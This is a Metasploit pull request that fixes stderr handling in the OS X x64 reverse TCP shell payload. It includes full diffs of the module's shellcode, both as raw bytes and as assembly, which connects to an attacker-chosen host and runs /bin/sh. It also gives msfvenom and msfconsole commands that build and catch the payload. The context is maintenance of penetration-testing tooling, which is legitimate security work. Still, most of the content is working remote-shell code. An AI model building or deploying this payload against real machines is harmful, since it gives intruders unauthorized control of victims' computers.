### PR TITLE
fix #14516, fix stderr output in osx/x64/shell_reverse_tcp

### DIFF
--- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
@@ -4,7 +4,8 @@
 ##
 
 module MetasploitModule
-  CachedSize = 108
+
+  CachedSize = 128
 
   include Msf::Payload::Single
   include Msf::Payload::Osx
@@ -69,10 +70,13 @@ module MetasploitModule
       syscall
       mov rdi,r12
       mov eax,0x200005a
-      xor rsi,rsi
+      mov rsi,2
       syscall
       mov eax,0x200005a
-      inc rsi
+      mov rsi,1
+      syscall
+      mov eax,0x200005a
+      mov rsi,0
       syscall
       xor rax,rax
       mov eax,0x200003b

--- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb
@@ -3,9 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 module MetasploitModule
-
   CachedSize = 108
 
   include Msf::Payload::Single
@@ -13,76 +11,82 @@ module MetasploitModule
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'OS X x64 Shell Reverse TCP',
-      'Description'   => 'Connect back to attacker and spawn a command shell',
-      'Author'        => 'nemo <nemo[at]felinemenace.org>',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'osx',
-      'Arch'          => ARCH_X64,
-      'Handler'       => Msf::Handler::ReverseTcp,
-      'Session'       => Msf::Sessions::CommandShellUnix
-    ))
+    super(
+      merge_info(
+        info,
+        'Name' => 'OS X x64 Shell Reverse TCP',
+        'Description' => 'Connect back to attacker and spawn a command shell',
+        'Author' => 'nemo <nemo[at]felinemenace.org>',
+        'License' => MSF_LICENSE,
+        'Platform' => 'osx',
+        'Arch' => ARCH_X64,
+        'Handler' => Msf::Handler::ReverseTcp,
+        'Session' => Msf::Sessions::CommandShellUnix
+      )
+    )
 
     # exec payload options
-
     register_options(
       [
-        OptString.new('CMD',   [ true,  "The command string to execute", "/bin/sh" ]),
+        OptString.new('CMD', [ true, 'The command string to execute', '/bin/sh' ]),
         Opt::LHOST,
         Opt::LPORT(4444)
-    ])
+      ]
+    )
   end
 
   # build the shellcode payload dynamically based on the user-provided CMD
   def generate
     lhost = datastore['LHOST'] || '127.0.0.1'
     # OptAddress allows either an IP or hostname, we only want IPv4
-    if not Rex::Socket.is_ipv4?(lhost)
-      raise ArgumentError, "LHOST must be in IPv4 format."
+    unless Rex::Socket.is_ipv4?(lhost)
+      raise ArgumentError, 'LHOST must be in IPv4 format.'
     end
 
-    cmd  = (datastore['CMD'] || '') + "\x00"
-    port = [datastore['LPORT'].to_i].pack('n')
-    ipaddr = [lhost.split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")
+    cmd = (datastore['CMD'] || '') + "\x00"
+    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
+    encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
+    encoded_host_port = format('0x%.8x%.8x', encoded_host, encoded_port)
 
-    call = "\xe8" + [cmd.length].pack('V')
-    payload =
-      "\xB8\x61\x00\x00\x02" +                     # mov eax,0x2000061
-      "\x6A\x02" +                                 # push byte +0x2
-      "\x5F" +                                     # pop rdi
-      "\x6A\x01" +                                 # push byte +0x1
-      "\x5E" +                                     # pop rsi
-      "\x48\x31\xD2" +                             # xor rdx,rdx
-      "\x0F\x05" +                                 # loadall286
-      "\x49\x89\xC4" +                             # mov r12,rax
-      "\x48\x89\xC7" +                             # mov rdi,rax
-      "\xB8\x62\x00\x00\x02" +                     # mov eax,0x2000062
-      "\x48\x31\xF6" +                             # xor rsi,rsi
-      "\x56" +                                     # push rsi
-      "\x48\xBE\x00\x02" + port +                  # mov rsi,0x100007fb3150200
-      ipaddr +
-      "\x56" +                                     # push rsi
-      "\x48\x89\xE6" +                             # mov rsi,rsp
-      "\x6A\x10" +                                 # push byte +0x10
-      "\x5A" +                                     # pop rdx
-      "\x0F\x05" +                                 # loadall286
-      "\x4C\x89\xE7" +                             # mov rdi,r12
-      "\xB8\x5A\x00\x00\x02" +                     # mov eax,0x200005a
-      "\x48\x31\xF6" +                             # xor rsi,rsi
-      "\x0F\x05" +                                 # loadall286
-      "\xB8\x5A\x00\x00\x02" +                     # mov eax,0x200005a
-      "\x48\xFF\xC6" +                             # inc rsi
-      "\x0F\x05" +                                 # loadall286
-      "\x48\x31\xC0" +                             # xor rax,rax
-      "\xB8\x3B\x00\x00\x02" +                     # mov eax,0x200003b
-      call +                                       # call CMD.len
-      cmd +                                        # CMD
-      "\x48\x8B\x3C\x24" +                         # mov rdi,[rsp]
-      "\x48\x31\xD2" +                             # xor rdx,rdx
-      "\x52" +                                     # push rdx
-      "\x57" +                                     # push rdi
-      "\x48\x89\xE6" +                             # mov rsi,rsp
-      "\x0F\x05"                                   # loadall286
+    shell_asm = %(
+      mov eax,0x2000061
+      push 0x2
+      pop rdi
+      push 0x1
+      pop rsi
+      xor rdx,rdx
+      syscall
+      mov r12,rax
+      mov rdi,rax
+      mov eax,0x2000062
+      xor rsi,rsi
+      push rsi
+      mov rsi, #{encoded_host_port}
+      push rsi
+      mov rsi,rsp
+      push 0x10
+      pop rdx
+      syscall
+      mov rdi,r12
+      mov eax,0x200005a
+      xor rsi,rsi
+      syscall
+      mov eax,0x200005a
+      inc rsi
+      syscall
+      xor rax,rax
+      mov eax,0x200003b
+      call load_cmd
+      db "#{cmd}", 0x00
+    load_cmd:
+      pop rdi
+      xor rdx,rdx
+      push rdx
+      push rdi
+      mov rsi,rsp
+      syscall
+    )
+
+    Metasm::Shellcode.assemble(Metasm::X64.new, shell_asm).encode_string
   end
 end


### PR DESCRIPTION
Fix #14516 by calling dup2 on stderr

## Verification

- [ ] Start a handler: `msfconsole -qx "use exploit/multi/handler; set payload osx/x64/shell_reverse_tcp; set LHOST $LHOST; set LPORT 4444; set ExitOnSession false; run -j"`
- [ ] Create a payload: `msfvenom -p osx/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f macho -o shell`
- [ ] Run the payload on OSX: `chmod +x shell && ./shell`
- [ ] Ensure cmd_exec tests now pass:
```
loadpath test/modules
use post/test/cmd_exec
set SESSION -1
run
```

## Before fix:

```
msf6 post(test/cmd_exec) > run

[!] SESSION may not be compatible with this module.
[*] Running against session -1
[*] Session type is shell and platform is osx
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[-] FAILED: should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[-] Passed: 6; Failed: 1
[*] Post module execution completed
```


## After fix:
```
msf6 post(test/cmd_exec) > run

[!] SESSION may not be compatible with this module.
[*] Running against session -1
[*] Session type is shell and platform is osx
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[*] Passed: 7; Failed: 0
[*] Post module execution completed

```